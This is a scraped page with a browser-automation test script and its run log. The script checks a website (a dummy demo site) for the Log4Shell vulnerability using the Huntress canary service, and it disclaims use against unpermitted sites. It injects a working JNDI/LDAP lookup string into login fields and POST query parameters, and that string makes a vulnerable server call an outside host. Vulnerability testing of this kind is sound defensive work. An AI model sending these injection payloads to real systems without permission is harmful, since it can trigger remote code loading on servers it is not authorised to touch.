xxxxxxxxxx//// Change this to the site you wish to test against// As mentioned on huntress Log4Shell, a negative test does // NOT mean that your site is not vulnerable.//// While this script is meant to be generic, you can modify// it to be specific to your login page manually if needed.//// See: https://log4shell.huntress.com///// Note this script was last updated : 14th Dec 2021//// !!! MODIFY THE SITE URL HERE (phptravels, is a dummy testing site)let testSite = "https://www.phptravels.net/"//------------------------------------------------------------------------TEST.log.info("DISCLAIMER: Your site is not guranteed to be safe, if this test passes, it only means you are definately vunerable if it fails - see : https://log4shell.huntress.com/ for more info.")TEST.log.info("This test snippet/test function should ONLY be used against sites you are permitted to test against")// Function which helps make this test, easily reusable across multiple URLSSfunction testWebsiteForLog4Shell(testURL) { // Lets get the log4shell test token I.goTo("https://log4shell.huntress.com/") let log4shell_id = I.getText("/html/body/main/div/p[5]/code") let log4shell_str = "${jndi:ldap://log4shell.huntress.com:1389/"+log4shell_id+"}"; TEST.log.info("Log4Shell Test ID: "+log4shell_id) // Lets go to the target site, and test it I.goTo(testURL) //------------------------------------------------------------------------ if( ( I.see$$("unusual activity") || I.see$$("protected") ) && I.see$$("206.189") ) { TEST.log.info("Log4Shell Test Aborted : your website is protected by a WAF which blocks common attack patterns for this exploit - it is still recommended to validate internally, and ensure your system is protected without the use of a WAF"); }Hi, I'm TAMI (Test Authoring Machine Intelligence).
SUCCESS!
1m 49s (17s)
1.
[start of test]
2.
DISCLAIMER: Your site is not guranteed to be safe, if this test passes, it only means you are definately vunerable if it fails - see : https://log4shell.huntress.com/ for more info.
3.
This test snippet/test function should ONLY be used against sites you are permitted to test against
4.
I go to "https://log4shell.huntress.com/"
1.3s
5.
I get text from "/html/body/main/div/p[5]/code"
0.1s
6.
Log4Shell Test ID: 625505f8-216d-497f-916b-3df24ff881b8
7.
I go to "https://www.phptravels.net/"
3.5s
8.
I click "Login"
9.
I click "Password"
10.
I fill "Password": "${jndi:ldap://log4shell.huntress.com:1389/625505f8-216d-497f-916b-3df24ff881b8}"
2.2s
11.
I click "Email"
12.
I fill "Email": "${jndi:ldap://log4shell.huntress.com:1389/625505f8-216d-497f-916b-3df24ff881b8}"
2.6s
13.
I click "Login"
14.
I wait for 5s
5.0s
15.
POST https://www.phptravels.net/?x=%24%7Bjndi%3Aldap%3A%2F%2Flog4shell.huntress.com%3A1389%2F625505f8-216d-497f-916b-3df24ff881b8%7D
Info: 403
0.4s
16.
POST https://www.phptravels.net//api?x=%24%7Bjndi%3Aldap%3A%2F%2Flog4shell.huntress.com%3A1389%2F625505f8-216d-497f-916b-3df24ff881b8%7D
Info: 403
0.3s
17.
POST api.https://www.phptravels.net/?x=%24%7Bjndi%3Aldap%3A%2F%2Flog4shell.huntress.com%3A1389%2F625505f8-216d-497f-916b-3df24ff881b8%7D
Info: Failed to execute 'send' on 'XMLHttpRequest': Failed to load 'api.https://www.phptravels.net/?x=%24%7Bjndi%3Aldap%3A%2F%2Flog4shell.huntress.com%3A1389%2F625505f8-216d-497f-916b-3df24ff881b8%7D'.
18.
POST api.https://www.phptravels.net//api?x=%24%7Bjndi%3Aldap%3A%2F%2Flog4shell.huntress.com%3A1389%2F625505f8-216d-497f-916b-3df24ff881b8%7D
Info: Failed to execute 'send' on 'XMLHttpRequest': Failed to load 'api.https://www.phptravels.net//api?x=%24%7Bjndi%3Aldap%3A%2F%2Flog4shell.huntress.com%3A1389%2F625505f8-216d-497f-916b-3df24ff881b8%7D'.
19.
I go to "https://log4shell.huntress.com/view/625505f8-216d-497f-916b-3df24ff881b8"
1.1s
20.
GET https://log4shell.huntress.com/json/625505f8-216d-497f-916b-3df24ff881b8
0.1s
21.
No active Log4Shell exploit found
22.
[end of test]